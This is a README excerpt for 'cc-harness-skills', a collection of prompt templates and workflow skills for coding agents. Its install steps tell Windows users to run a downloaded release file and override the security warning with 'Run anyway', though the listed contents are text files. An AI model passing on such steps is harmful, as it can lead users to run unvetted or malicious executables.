以下摘录自该仓库的 README(片段) · 在 GitHub 读完整 README →

🚀 Getting Started
cc-harness-skills gives you a set of portable skills for memory, verification, multi-agent coordination, context compression, and coding-agent workflows.
Use it when you want a cleaner way to manage agent tasks, keep context small, and check work before moving on.
📥 Download and Install
1. Open the Releases page
2. Download the latest release for Windows
3. If the file comes in a zip folder, right-click it and choose **Extract All**
4. Open the extracted folder
5. Run the included file or follow the file name in the release notes
If Windows shows a security prompt:
1. Click **More info**
2. Click **Run anyway**
🖥️ Windows Setup
This app is built for regular Windows use and works best on:
- Windows 10
- Windows 11
You do not need to install extra tools in most cases.
If the release includes a folder of skills or templates:
1. Keep the folder in a place you can find again, such as **Downloads** or **Desktop**
2. Do not rename files unless the release notes ask you to
3. Open the main file from the extracted folder
If the release includes a setup app:
1. Double-click the installer
2. Follow the on-screen steps
3. Finish the install and open the app from the Start menu or desktop shortcut
🧰 What It Does
This project helps with tasks like:
- Keeping track of work across multiple steps
- Saving useful context for later use
- Checking results before you move on
- Breaking large tasks into smaller pieces
- Compressing long context into short, useful notes
- Helping coding agents stay on task
- Supporting multi-agent handoffs
- Reducing repeated prompts and restating the same goals
It is useful when you want a steadier workflow and less back-and-forth.
🧠 Main Skills
Memory
Store useful details so the agent can keep track of what matters.
Verification
Check results before you accept them.
Multi-Agent Coordination
Help different agents share work without losing the thread.
Context Compression
Shorten long context into a tighter form that is easier to reuse.
Proactive Coding Workflows
Guide agent steps so work moves forward with less manual repetition.
📁 Typical Contents
A release may include:
- Skill files
- Prompt templates
- Workflow notes
- Reference folders
- Example configs
Keep the folder structure intact so the skills work as expected.
🔍 How to Use It
1. Open the files you downloaded
2. Read the included skill names or folder labels
3. Pick the skill that fits your task
4. Copy the prompt or follow the file instructions
5. Use it in your coding-agent setup or workflow tool
6. Check the output with the verification steps
7. Save useful context for the next task
If you work with more than one agent:
1. Give each agent a clear task
2. Keep shared notes short
3. Pass only the key facts forward
4. Verify the result before the next handoff
🧩 Best Use Cases
- Coding help across several steps
- Rewriting long instructions into shorter ones
- Keeping project state in one place
- Reviewing changes before they go live
